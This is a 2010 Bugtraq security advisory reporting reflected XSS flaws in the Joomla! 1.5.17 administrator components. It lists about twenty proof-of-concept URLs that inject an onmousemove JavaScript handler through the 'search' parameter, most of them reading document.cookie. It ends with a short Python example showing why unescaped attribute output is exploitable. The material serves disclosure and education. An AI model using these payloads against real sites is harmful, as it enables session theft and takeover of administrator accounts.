Message-ID: <AANLkTikLAI00y8EhaNKNG9DNcWDZUKeB7TNgbkC_bGfs@mail.gmail.com>
Date: Wed, 2 Jun 2010 02:49:40 +0530
From: Riyaz Walikar <riyazwalikar@...il.com>
To: bugtraq@...urityfocus.com
Subject: [20100501] - Core - Joomla! Multiple XSS Vulnerabilities in Back End 
	Administrative Module Core Components

Hi Bugtraq,

This is regarding multiple XSS vulnerabilities in multiple core
components of the administrative section of Joomla!

* Project: Joomla!
* SubProject: All
* Severity: High
* Versions: 1.5.17 and all previous 1.5 releases
* Exploit type: XSS Injection
* Reported Date: 2010-May-13
* Fixed Date: 2010-May-28
* Fixed Version: Joomla! 1.5.18
* Update Download Link: http://www.joomla.org/download.html
* Info URL: http://developer.joomla.org/security/news/314-20100501-core-xss-vulnerabilities-in-back-end.html

Vulnerability Details:

A user can execute arbitrary JavaScript code within the vulnerable application.


The vulnerability arises because the administrator core components
fail to properly sanitize user-supplied input in the "search"
variable. Successful exploitation of this vulnerability could result
in, but is not limited to, compromise of the application, theft of
cookie-based authentication credentials, arbitrary URL redirection,
disclosure or modification of sensitive data, and phishing attacks.


An attacker can send a link with the exploit to an administrator whose
access could compromise the application. The following PoC is
available:


http://joomlasite/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E
http://joomlasite/administrator/index.php?option=com_users&search=%22%20onmousemove=%22javascript:window.location.assign%28%27http://www.google.com%27%29%22%3E


http://joomlasite/administrator/index.php?option=com_trash&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_content&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_sections&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_categories&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_frontpage&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_menus&task=view&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_messages&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_banners&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_banners&c=client&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_categories&section=com_banner&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_contact&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_categories&section=com_contact_details&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_newsfeeds&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_categories&section=com_newsfeeds&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_poll&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_weblinks&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_categories&section=com_weblinks&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_modules&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E



http://joomlasite/administrator/index.php?option=com_plugins&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E

Regards,
Riyaz Ahemed Walikar
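
The root cause described in the advisory, as an added example that is not part of the original message and is not Joomla! code: the decoded "search" value from the first PoC URL is placed in an HTML attribute with and without output encoding, and the result is parsed to show which attributes end up on the element. The `FIELD` markup and all function names are assumptions made for illustration.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# First PoC URL from the advisory ("joomlasite" is the advisory's placeholder host).
POC_URL = ("http://joomlasite/administrator/index.php?option=com_users"
           "&search=%22%20onmousemove=%22javascript:alert%28document.cookie%29;%22%3E")

# Assumed markup for the back-end filter box; the advisory does not show the template.
FIELD = '<input type="text" name="search" value="{}" />'


def search_param(url):
    """Return the URL-decoded "search" parameter, as the server receives it."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True)["search"][0]


def render_unescaped(search):
    """Vulnerable pattern: request data is written into the attribute verbatim."""
    return FIELD.format(search)


def render_escaped(search):
    """Hardened pattern: encode & < > " ' for the HTML attribute context."""
    return FIELD.format(escape(search, quote=True))


class _InputAttrs(HTMLParser):
    """Records the attributes an HTML parser sees on each <input> tag."""

    def __init__(self):
        super().__init__()
        self.inputs = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.inputs.append(dict(attrs))


def input_attributes(markup):
    """Parse markup and return the attribute dict of the first <input> element."""
    parser = _InputAttrs()
    parser.feed(markup)
    parser.close()
    return parser.inputs[0]


def event_handlers(markup):
    """Names of on* attributes that ended up on the <input> element."""
    return sorted(n for n in input_attributes(markup) if n.startswith("on"))
```

With the unescaped rendering, the leading double quote closes `value` and `onmousemove` becomes an attribute of its own; with encoding, the whole string stays inside `value`.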
